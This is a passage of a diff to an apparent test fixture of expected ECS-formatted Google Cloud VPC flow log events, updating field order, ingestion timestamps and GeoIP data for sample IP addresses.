"{\"insertId\":\"ut8lbrffooxz8\",\"jsonPayload\":{\"bytes_sent\":\"167939\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33880,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821308944Z\",\"packets_sent\":\"63\",\"reporter\":\"DEST\",\"rtt_msec\":\"3\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.469099728Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.469099728Z", @@ -896,9 +931,36 @@ } }, { + "@timestamp": "2019-06-14T03:50:10.845Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "192.168.2.23", + "10.139.99.242" + ] + }, "log": { "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, + "gcp": { + "destination": { + "vpc": { + "project_id": "my-sample-project", + "subnetwork_name": "default", + "vpc_name": "default" + }, + "instance": { + "region": "us-east1", + "project_id": "my-sample-project", + "zone": "us-east1-b" + } + }, + "vpcflow": { + "reporter": "DEST" + } + }, "destination": { "address": "10.139.99.242", "port": 22, @@ -921,6 +983,16 @@ "ip": "192.168.2.23", "packets": 3 }, + "event": { + "ingested": "2021-12-14T14:43:27.415175587Z", + "original": "{\"insertId\":\"ut8lbrffooxyt\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"192.168.2.23\",\"src_port\":59679},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:46.031032701Z\",\"packets_sent\":\"3\",\"reporter\":\"DEST\",\"src_location\":{\"asn\":49505,\"city\":\"Saint Petersburg\",\"continent\":\"Europe\",\"country\":\"rus\",\"region\":\"Saint Petersburg\"},\"start_time\":\"2019-06-14T03:40:45.860349247Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:45.860349247Z", + "end": "2019-06-14T03:40:46.031032701Z", + "id": "ut8lbrffooxyt", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -932,43 +1004,6 @@ "iana_number": "6", "packets": 3, "direction": "inbound" - }, - "@timestamp": "2019-06-14T03:50:10.845Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.2.23", - "10.139.99.242" - ] - }, - "gcp": { - "destination": { - "vpc": { - "project_id": "my-sample-project", - "subnetwork_name": "default", - "vpc_name": "default" - }, - "instance": { - "region": "us-east1", - "project_id": "my-sample-project", - "zone": "us-east1-b" - } - }, - "vpcflow": { - "reporter": "DEST" - } - }, - "event": { - "ingested": "2021-12-09T13:37:46.391203800Z", - "original": "{\"insertId\":\"ut8lbrffooxyt\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"192.168.2.23\",\"src_port\":59679},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:46.031032701Z\",\"packets_sent\":\"3\",\"reporter\":\"DEST\",\"src_location\":{\"asn\":49505,\"city\":\"Saint Petersburg\",\"continent\":\"Europe\",\"country\":\"rus\",\"region\":\"Saint Petersburg\"},\"start_time\":\"2019-06-14T03:40:45.860349247Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:45.860349247Z", - "end": "2019-06-14T03:40:46.031032701Z", - "id": "ut8lbrffooxyt", - "category": "network", - "type": "connection" } }, { @@ -983,11 +1018,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33576, @@ -1059,7 +1099,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391207800Z", + "ingested": "2021-12-14T14:43:27.415176251Z", "original": "{\"insertId\":\"ut8lbrffooxz5\",\"jsonPayload\":{\"bytes_sent\":\"11773\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33576},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821056075Z\",\"packets_sent\":\"94\",\"reporter\":\"DEST\",\"rtt_msec\":\"201\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510622432Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.510622432Z", @@ -1081,11 +1121,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33562, @@ -1157,7 +1202,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391211200Z", + "ingested": "2021-12-14T14:43:27.415176789Z", "original": "{\"insertId\":\"ut8lbrffooxza\",\"jsonPayload\":{\"bytes_sent\":\"65699\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33562},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.393910944Z\",\"packets_sent\":\"356\",\"reporter\":\"DEST\",\"rtt_msec\":\"192\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.074897435Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.074897435Z", @@ -1173,11 +1218,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -1255,7 +1305,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391215700Z", + "ingested": "2021-12-14T14:43:27.415177309Z", "original": "{\"insertId\":\"ut8lbrffooxyq\",\"jsonPayload\":{\"bytes_sent\":\"66029\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33692},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"361\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500498059Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500498059Z", @@ -1271,11 +1321,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -1353,7 +1408,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391221400Z", + "ingested": "2021-12-14T14:43:27.415177776Z", "original": "{\"insertId\":\"ut8lbrffooxz2\",\"jsonPayload\":{\"bytes_sent\":\"65154\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33542},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565272745Z\",\"packets_sent\":\"360\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.150720950Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.150720950Z", @@ -1369,11 +1424,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -1451,7 +1511,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391226900Z", + "ingested": "2021-12-14T14:43:27.415178222Z", "original": "{\"insertId\":\"ut8lbrffooxyo\",\"jsonPayload\":{\"bytes_sent\":\"13643\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33970},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821302149Z\",\"packets_sent\":\"99\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466657665Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.466657665Z", @@ -1462,34 +1522,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "address": "10.49.136.133", - "port": 46864, - "domain": "simianhacker-demo", - "ip": "10.49.136.133" - }, - "source": { - "address": "67.43.156.13", - "port": 9243, - "bytes": 34509840, - "packets": 8690, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:j0PdUfLhQ/r+kYCVQX20c/nfCSc=", - "bytes": 34509840, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 8690, - "direction": "inbound" - }, "@timestamp": "2019-06-14T03:50:10.845Z", "ecs": { "version": "1.12.0" @@ -1500,6 +1532,9 @@ "10.49.136.133" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { @@ -1520,53 +1555,55 @@ } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391232500Z", - "original": "{\"insertId\":\"ut8lbrffooxzc\",\"jsonPayload\":{\"bytes_sent\":\"34509840\",\"connection\":{\"dest_ip\":\"10.49.136.133\",\"dest_port\":46864,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":9243},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"simianhacker-demo\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:29.432367659Z\",\"packets_sent\":\"8690\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"start_time\":\"2019-06-14T03:40:17.343890802Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:17.343890802Z", - "end": "2019-06-14T03:49:29.432367659Z", - "id": "ut8lbrffooxzc", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { - "address": "10.87.40.76", - "port": 5601, - "domain": "kibana", - "ip": "10.87.40.76" + "address": "10.49.136.133", + "port": 46864, + "domain": "simianhacker-demo", + "ip": "10.49.136.133" }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", - "port": 34836, - "bytes": 1467, + "port": 9243, + "bytes": 34509840, "ip": "67.43.156.13", - "packets": 7 + "packets": 8690 + }, + "event": { + "ingested": "2021-12-14T14:43:27.415178789Z", + "original": "{\"insertId\":\"ut8lbrffooxzc\",\"jsonPayload\":{\"bytes_sent\":\"34509840\",\"connection\":{\"dest_ip\":\"10.49.136.133\",\"dest_port\":46864,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":9243},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"simianhacker-demo\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:29.432367659Z\",\"packets_sent\":\"8690\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"start_time\":\"2019-06-14T03:40:17.343890802Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:17.343890802Z", + "end": "2019-06-14T03:49:29.432367659Z", + "id": "ut8lbrffooxzc", + "category": "network", + "type": "connection" }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:qoQEykwJ/Fqctc/3YyFJSUPTETc=", - "bytes": 1467, + "community_id": "1:j0PdUfLhQ/r+kYCVQX20c/nfCSc=", + "bytes": 34509840, "transport": "tcp", "type": "ipv4", "iana_number": "6", - "packets": 7, + "packets": 8690, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:10.845Z", "ecs": { "version": "1.12.0" @@ -1577,6 +1614,9 @@ "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { @@ -1597,8 +1637,33 @@ } } }, + "destination": { + "address": "10.87.40.76", + "port": 5601, + "domain": "kibana", + "ip": "10.87.40.76" + }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 34836, + "bytes": 1467, + "ip": "67.43.156.13", + "packets": 7 + }, "event": { - "ingested": "2021-12-09T13:37:46.391238100Z", + "ingested": "2021-12-14T14:43:27.415180588Z", "original": "{\"insertId\":\"ut8lbrffooxz7\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":34836},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:48:39.076420731Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:48:38.961050187Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:48:38.961050187Z", @@ -1606,6 +1671,18 @@ "id": "ut8lbrffooxz7", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:qoQEykwJ/Fqctc/3YyFJSUPTETc=", + "bytes": 1467, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 7, + "direction": "inbound" } }, { @@ -1614,11 +1691,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -1696,7 +1778,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391243800Z", + "ingested": "2021-12-14T14:43:27.415180999Z", "original": "{\"insertId\":\"ut8lbrffooxyu\",\"jsonPayload\":{\"bytes_sent\":\"63671\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33554},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565311154Z\",\"packets_sent\":\"367\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500506974Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500506974Z", @@ -1707,18 +1789,51 @@ } }, { + "@timestamp": "2019-06-14T03:50:10.845Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.139.99.242", + "67.43.156.13" + ] + }, "log": { "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, + "gcp": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 220 + } + }, + "source": { + "vpc": { + "project_id": "my-sample-project", + "subnetwork_name": "default", + "vpc_name": "default" + }, + "instance": { + "region": "us-east1", + "project_id": "my-sample-project", + "zone": "us-east1-b" + } + } + }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65320, @@ -1732,6 +1847,16 @@ "domain": "elasticsearch", "ip": "10.139.99.242" }, + "event": { + "ingested": "2021-12-14T14:43:27.415181410Z", + "original": "{\"insertId\":\"ut8lbrffooxyv\",\"jsonPayload\":{\"bytes_sent\":\"51075\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65320,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220714119Z\",\"packets_sent\":\"608\",\"reporter\":\"SRC\",\"rtt_msec\":\"220\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.560917237Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:00.560917237Z", + "end": "2019-06-14T03:49:56.220714119Z", + "id": "ut8lbrffooxyv", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -1743,46 +1868,6 @@ "iana_number": "6", "packets": 608, "direction": "outbound" - }, - "@timestamp": "2019-06-14T03:50:10.845Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.139.99.242", - "67.43.156.13" - ] - }, - "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 220 - } - }, - "source": { - "vpc": { - "project_id": "my-sample-project", - "subnetwork_name": "default", - "vpc_name": "default" - }, - "instance": { - "region": "us-east1", - "project_id": "my-sample-project", - "zone": "us-east1-b" - } - } - }, - "event": { - "ingested": "2021-12-09T13:37:46.391249300Z", - "original": "{\"insertId\":\"ut8lbrffooxyv\",\"jsonPayload\":{\"bytes_sent\":\"51075\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65320,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220714119Z\",\"packets_sent\":\"608\",\"reporter\":\"SRC\",\"rtt_msec\":\"220\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.560917237Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:00.560917237Z", - "end": "2019-06-14T03:49:56.220714119Z", - "id": "ut8lbrffooxyv", - "category": "network", - "type": "connection" } }, { @@ -1791,11 +1876,16 @@ }, "destination": { "geo": 